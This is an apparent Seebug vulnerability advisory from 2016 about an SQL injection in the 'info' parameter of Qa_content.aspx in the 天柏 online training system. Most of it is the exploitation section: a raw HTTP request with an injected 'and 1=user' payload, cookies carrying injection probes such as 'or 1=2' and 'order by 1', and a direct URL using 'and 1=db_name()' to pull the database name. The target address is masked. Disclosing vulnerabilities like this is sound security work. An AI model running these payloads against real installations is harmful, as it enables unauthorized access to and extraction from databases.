天柏在线培训系统 Qa_content.aspx 参数info SQL注入漏洞

2016-04-21T00:00:00
ID SSV:91353
Type seebug
Reporter kikay
Modified 2016-04-21T00:00:00

Description

0x01漏洞简介

天柏在线培训系统网校版在/Webpage/Qa_content.aspx处对参数info过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞执行SQL指令。

0x02漏洞利用

漏洞测试地址:

http://**.**.**.**/Webpage/Qa_content.aspx?info=4124 参数info存在注入

测试数据:

``` GET /Webpage/Qa_content.aspx?info=4124%20and%201=user HTTP/1.1

Host: ...

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: ASP.NET_SessionId=ti5ge3tdhk1mwkqko1zret0y; '...4124-1'=...4124-1; CheckCode=; '...4124--'=...4124--; '...4124 or 1=2'=...4124 or 1=2; '...4124 order by 1'=...4124 order by 1; '...4124 order by 1'=...4124 order by 1

Connection: keep-alive ```

直接提交:

http://**.**.**.**/Webpage/Qa_content.aspx?info=4124 and 1=db_name()